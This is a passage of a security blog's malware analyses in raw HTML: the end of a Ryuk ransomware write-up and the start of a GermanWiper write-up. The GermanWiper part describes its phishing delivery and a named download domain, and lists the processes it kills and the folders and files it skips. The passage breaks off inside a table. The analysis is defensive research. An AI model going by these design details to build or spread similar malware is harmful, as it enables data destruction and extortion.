<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 34px; overflow: hidden; width: 613px;"><img height="34" src="https://lh4.googleusercontent.com/XUHJeT7iMpZ2zhQt31mSegt_BkfDE0tIMBwE9W8XE7TZ16RriFHks8HkeX6KHWrzaLNoyRIDFeRCxBK_J4hSS-3KtGkF95OXoE13M8MfzPdQS3GNZjNZCd8015xzKJvRefvphij-" style="margin-left: 0px; margin-top: 0px;" width="613" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
The PDB info includes the paths to the header and source files of third-party packages used in the project.<br />
<br />
Also, the ransomware has ‘\PIPE\samr’ pipe name in the code that indicates the fact that it uses RPC over SMB protocol. This functionality can be used for user and group enumeration, which can be a part of lateral movement as well as for task scheduling on a remote computer.<br />
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="color: black; font-family: "arial"; font-size: 20pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre;">Conclusion</span></h4>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Ruyk derives Hermes source code that can be found on numerous underground forums. It uses symmetric (AES) with asymmetric (RSA) encryption to prevent decrypting victim’s files without knowing the master private key. The ransomware deletes backup files and Windows shadow copies making it impossible to restore data from local backups. To avoid being detected by antiviruses, Ryuk employs obfuscation of its code. It has also the capabilities for hosts network discovery in a local network to encrypt network drives as well as for lateral movement using RPC over SMB. Thus, it can be effectively used by attackers in future targeted attacks to maximize the losses of a targeted organization.<br />
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="color: black; font-family: "arial"; font-size: 20pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre;">IoCs</span></h4>
</div>
LithuanianicMercy.exe<br />
SHA-256: dd0691992d947366f1b9caf2acc1fec951f761a39ca3863e81bc2c3fb5efd415<br />
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="color: black; font-family: "arial"; font-size: 20pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre;">Read also</span></h4>
<ul style="text-align: left;">
<li><span style="color: black;"><a href="https://www.bleepingcomputer.com/news/security/dch-hospital-pays-ryuk-ransomware-for-decryption-key/">https://www.bleepingcomputer.com/news/security/dch-hospital-pays-ryuk-ransomware-for-decryption-key/</a></span></li>
<li><a href="https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/"><span style="color: black;">https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/</span></a></li>
<li><a href="https://www.gdatasoftware.com/blog/2019/08/35046-whats-all-the-buzz-about-looking-at-the-ryuk-ransomware-as-an-example"><span style="color: black;">https://www.gdatasoftware.com/blog/2019/08/35046-whats-all-the-buzz-about-looking-at-the-ryuk-ransomware-as-an-example</span></a></li>
<li><a href="https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/"><span style="color: black;">https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/</span></a></li>
</ul>
</div>
</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-25032602977594906152019-09-29T12:11:00.003-07:002019-11-13T04:31:14.086-08:00GermanWiper: One More Wiper Pretending to Be Ransomware<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRQbX32WF5xD2ArWvbxdtkLAnHbwHL7JAldd4th758dSs1H1HwNSQYI0tBzymLwsa3k28h38vQXaZ-PiA7yxP6yXaJgAWUrMBWTg2lV8HSq6Q1TxyiqyBj6fhFLxASc_nHisVjwvEgcIBh/s1600/GermanWiper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="427" data-original-width="930" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRQbX32WF5xD2ArWvbxdtkLAnHbwHL7JAldd4th758dSs1H1HwNSQYI0tBzymLwsa3k28h38vQXaZ-PiA7yxP6yXaJgAWUrMBWTg2lV8HSq6Q1TxyiqyBj6fhFLxASc_nHisVjwvEgcIBh/s640/GermanWiper.png" width="640" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<i><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">[Authors: </span><span style="font-family: arial; font-size: 14.6667px; white-space: pre;">Viktoria Taran, Alexander Adamov</span><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">]</span></i><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">GermanWiper was first seen on the </span><a href="https://www.bleepingcomputer.com/news/security/germanwiper-ransomware-erases-data-still-asks-for-ransom/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">BleepingComputer</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> forum on July 30, 2019. After analysis, it turned out that the malware is rather a wiper than ransomware. Interestingly, </span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">GermanWiper managed to raise $9,000 almost reaching the result of </span><a href="https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">$10,500 (4.13528947 BTC)</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> earned by another wiper called NotPetya in June 2017. </span><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Let us take a close look at the ransomware to find out the installation process, communication details, and wiping details.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<a name='more'></a><br />
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Static Analysis</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The ransomware file is PE32 executable for MS Windows. It is </span><span style="background-color: transparent; color: #4d4d4d; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">2053632</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> bytes in size. The payload code is written and compiled in Borland Delphi. In addition, it employs the Enigma protector, which code is written in Microsoft Visual C++. According to the compilation timestamp, the binary was compiled on July 31, 2019.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="101" src="https://lh6.googleusercontent.com/zK-IW8w6KTU9bSuhQYcxArZa1PaN4tqCtORhbIX_QviPCxRahKm3zjwb2vn7Alqf0QpEENLO4bKZjdx-yGsvUCpDRMzcbo9XrTWu1Ti3zStIS3AOQiO64zvByL5QHNVbb-7DRGXG" style="border: none;" width="406" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The wiper's code was compiled in Borland Delphi.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="101" src="https://lh4.googleusercontent.com/gQYlAl7nhvHW1TFeZhlAKsLjgNy1Zlo020oxpU5x7Wn0vgQegd3i3sVCvYYXQNn6YUzyVQyry8e7GPTgKFdQ7Rdqe0ZR1ZGCJ1VjDKcF_oJ_rr2AYj1Jo6QTB973vBVXjYMBYBKS" style="border: none;" width="412" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="560" src="https://lh5.googleusercontent.com/DAq61cBEL1V8_UkxLXnyOGGrU-YLzHe6UGI45lVogl9kVnGk3d3Vt_RS0wGC6I0GFPuibdWOPkfckW6O2i3vvo3Ne2LXsRjF4p3OjnctKpMZKi5TW_wkqNdJdDFG7l04gW0disD1" style="border: none;" width="455" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SHA-256: 21c756af39c6a502f7ec173f0643389806912efc1947a93bd6618fe2dae58e39</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Attack Vector</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GermanWiper is being spread over Germany as emails that include the rogueLena Kretschmer's resume. Launching one of the .lnk file ‘</span><span style="background-color: white; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Bewerbung-Lena-Kretschmer.exe’ in the attachment leads</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> to downloading the malware from ‘expandingdelegation.top’ web page. </span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">According to </span><a href="https://www.bleepingcomputer.com/news/security/germanwiper-ransomware-erases-data-still-asks-for-ransom/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">BleepingComputer</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">, there is a similarity in delivery methods between GermanWiper and </span><a href="https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-distributed-by-hackers-posing-as-german-bsi/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">recent Sodinokibi ransomware campaign</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> in which attackers distributed a fake email allegedly from BSI, the German Federal Office for Information Security.</span></div>
<div>
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The whole infection chain can be seen at </span><a href="https://app.any.run/tasks/62e0b723-a33b-4be7-8815-c2dc95404c62/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">app.any.run sandbox</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.</span></div>
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Installation</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Once executed, the ransomware terminates the next processes to release locked files with user’s data:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">notepad.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">dbeng50.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sqbcoreservice.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">encsvc.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mydesktopservice.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">isqlplussvc.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">agntsvc.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sql.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sqld.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mysql.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mysqld.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">oracle.exe</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="214" src="https://lh3.googleusercontent.com/pop1alWWtghKcTl30LqVLM7a8MHqW92ILN8iV4IjTw1FV0CbIUoTZOei_L3umnTviAD8Q2Q3g1Y7IkB7oc6uKaFHTFJPvCkhr9IHB8xcUcvx10yQyaojEXClFu5WtKo_pYPRntw_" style="border: none;" width="656" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">After that, it scans for the system folders, files, and file extensions to avoid their encryption which can lead to destroying the system.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: -0.75pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="123"></col><col width="196"></col><col width="138"></col><col width="197"></col></colgroup><tbody>
<tr style="height: 117pt;"><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">windows</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">recycle.bin</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mozilla</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">google</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">boot</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">application data</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">appdata</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">program files</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">program files (x86)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">programme</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">programme (x86)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">programdata</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">perflogs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">intel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">msocache</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">system volume information</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">autorun.inf</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">boot.ini</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">bootfont.bin</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">bootsect.bak</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">desktop.ini</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">iconcache.db</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ntldr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ntuser.dat</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ntuser.dat.log</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ntuser.ini</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">bootmgr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">bootnxt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">thumbs.db</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="250" src="https://lh3.googleusercontent.com/JVaL4nsukDhvgXLJj85FCZY2pK6Zsl6AIX3qU17tawz4uu6N2Asy0GFd59cW6UZswxoMEZFuXyT4YUp-84384uKIE2CKViD1ZlYlw7rYO_2ZOSVtVfhrMtmO-LYDmJigAo_vgc5p" style="border: none;" width="667" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="316" src="https://lh3.googleusercontent.com/neV-xbdCJRbkEez_1WUXM_FFoh3VSzvpFYjOI5yCKW1ZLIdt37CGZ-v4ODc2TTVkdEX6NPVfxfEd7LTsiN6ErifM6LiGJjupaT6SmKEvaE5Nu3-ssQBFr7bzGv2vueAOubXR3YOH" style="border: none;" width="624" /></span></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col><col width="*"></col><col width="*"></col><col width="*"></col></colgroup><tbody>
<tr style="height: 303pt;"><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
